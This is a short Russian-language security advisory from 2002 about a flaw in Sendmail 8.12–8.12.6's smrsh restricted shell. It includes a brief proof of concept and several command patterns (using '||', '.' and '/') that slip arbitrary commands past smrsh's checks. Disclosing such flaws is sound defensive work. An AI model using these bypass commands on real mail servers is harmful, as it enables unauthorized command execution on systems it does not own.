Выполнение произвольных команд вне ограниченной среды в Sendmail

Дата публикации:
04.10.2002
Всего просмотров:
730
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Sendmail – популярный почтовый агент для UNIX систем.

Программа smrsh (Sendmail Consortium-s Restricted SShell) разработана для предотвращения выполнения команд вне ограниченной среды. Однако, когда задаются команды, используя символы (||),(.) или (/), пользователи могут обойти проверки, выполняемые smrsh. Уязвимость позволяет пользователям выполнять команды не ограниченной среды. Пример:

$ echo "echo unauthorized execute" > /tmp/unauth 
$ smrsh -c ". || . /tmp/unauth || ." 
/bin/sh: /etc/smrsh/.: is a directory 
unauthorized execute
Или одну из следующих типов команд:
smrsh -c "/ command" 
smrsh -c "../ command" 
smrsh -c "./ command" 
smrsh -c "././ command"
уязвимость обнаружена в Sendmail Consortium Sendmail 8.12-8.12.6

Ссылки: Sendmail smrsh Bypass Vulnerabilities
или введите имя

CAPTCHA